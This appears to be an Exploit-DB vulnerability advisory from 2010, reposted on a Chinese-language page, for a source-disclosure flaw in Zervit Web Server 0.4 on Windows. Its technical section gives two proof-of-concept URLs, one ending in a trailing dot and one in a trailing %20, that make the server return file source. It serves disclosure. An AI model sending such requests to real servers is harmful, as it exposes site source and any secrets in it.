Zervit Web Server 0.4 – Source Disclosure/Download

  • 作者: Dr_IDE
    日期: 2010-05-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12581/
  • ###################################################################
    #
    # zervit Web Server v0.4 Source Disclosure/Download
    # Found By:	Dr_IDE
    # Date: 	May 12, 2010
    # Download:	http://zervit.sourceforge.net/
    # Tested on:	Windows 7
    #
    ###################################################################
    
    - Description -
    
    zervit HTTP Server v0.4 is a Windows based HTTP server. This is the latest
    version of the application available.
    
    zervit HTTP Server is vulnerable to common remote source disclosure attacks. 
    
    - Technical Details - (This is with Directory Listing = On or Off)
    
    http://[ webserver IP][:port]index.html.		(Source Download)
    http://[ webserver IP][:port]index.html%20		(Source Download)
    
    
    #[pocoftheday.blogspot.com]